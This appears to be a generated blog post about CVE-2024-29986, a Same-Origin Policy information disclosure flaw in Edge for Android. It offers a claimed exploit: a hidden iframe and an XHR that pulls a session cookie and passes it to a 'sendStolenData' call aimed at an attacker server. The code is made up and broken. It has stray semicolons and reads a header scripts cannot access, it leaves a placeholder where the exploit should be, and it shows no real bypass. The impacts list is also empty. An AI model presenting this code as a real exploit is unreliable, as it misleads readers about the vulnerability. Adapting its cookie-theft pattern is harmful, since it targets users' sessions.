CVE-2024-29986 – Microsoft Edge for Android (Chromium-based) Information Disclosure Vulnerability: Risks, Impacts, and Mitigation Actions

CVE-2024-29986 is a crucial vulnerability affecting the Chromium-based Microsoft Edge browser for Android. It allows attackers to exploit an information disclosure weakness, potentially granting unauthorized access to sensitive user data. This vulnerability not only poses serious threats to user privacy but also underscores the need for constant vigilance and updates in the fast-changing cybersecurity landscape. In this post, we'll dive deep into CVE-2024-29986, the risks involved, potential impacts, and recommended mitigation actions. We'll also provide code snippets, links to original references, and a detailed look at the exploit details.

References

- NVD - CVE-2024-29986: https://nvd.nist.gov/vuln/detail/CVE-2024-29986
- Microsoft Security Advisory: https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2024/29986
- Chromium Project: https://www.chromium.org/Home

Vulnerability Details

The vulnerability in question, CVE-2024-29986, exposes sensitive information to an attacker in a specific scenario: when a user visits a malicious website using the Microsoft Edge browser on Android. The vulnerability enables an attacker to bypass the Same-Origin Policy (SOP) designed to restrict web pages from accessing data loaded within another site. This could allow an attacker to access sensitive user-specific browser data, such as cookies, authorization tokens, or session information, and even alter user data in some cases.

How the Exploit Works (with code snippet)

The exploit hinges on leveraging a flaw in the Microsoft Edge's handling of iframes. Here's a brief code snippet illustrating how an attacker might exploit this vulnerability:

Host a malicious website with the following code

<!DOCTYPE html>
<html>
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <title>Malicious Site</title>
</head>
<body>
  <iframe src="https://www.example.com/"; id="target-iframe" width="" height="" style="visibility:hidden;"></iframe>
  <script>
    document.getElementById('target-iframe').onload = function() {
      // Exploit code goes here.
    };
  </script>
</body>
</html>

2. Craft and deploy exploit code that leverages the vulnerability, with the aim of stealing user-specific browser data:

  var xhr = new XMLHttpRequest();
  xhr.open('GET', 'https://www.example.com/';); // Target website
  xhr.onreadystatechange = function() {
    if (xhr.readyState == XMLHttpRequest.DONE) {
      var targetSessionInfo = /SessionInfo=([^;]+)/.exec(xhr.getResponseHeader('Set-Cookie'))[1];// Extract targeted info from cookies
      sendStolenData(targetSessionInfo); // Send targeted data to attacker-controlled server
    }
  };
  xhr.send();

Potential Impacts

Users affected by this vulnerability could face a wide range of impacts, including but not limited to:

Mitigation Actions

Microsoft has acknowledged the vulnerability and released security updates to patch the flaw in Microsoft Edge for Android. Users are strongly encouraged to apply security updates in a timely fashion and always keep their browsers up-to-date to ensure protection from such vulnerabilities.

To mitigate the risk of this vulnerability

1. Update Microsoft Edge for Android to the latest version. Instructions can be found on the official Microsoft website: https://support.microsoft.com/en-us/topic/update-microsoft-edge-for-android-aec07450-230e-4f25-9e7c-33c53177c3b9
2. Avoid visiting unknown or suspicious websites, and refrain from clicking on suspicious links shared via emails, messages, or social media.
3. Employ browser extensions or security software that can help detect and block potentially malicious websites and content.

Conclusion

The CVE-2024-29986 vulnerability serves as a stark reminder that even widely-used and generally trusted software can have its weaknesses. As users, it is our responsibility to stay informed, apply security updates diligently, and remain cautious in our online activities. By taking the recommended steps to mitigate this vulnerability, Android users of the Microsoft Edge browser can significantly reduce the risk of potential information disclosure attacks.

Timeline

Published on: 04/18/2024 19:15:11 UTC
Last modified on: 06/11/2024 15:25:23 UTC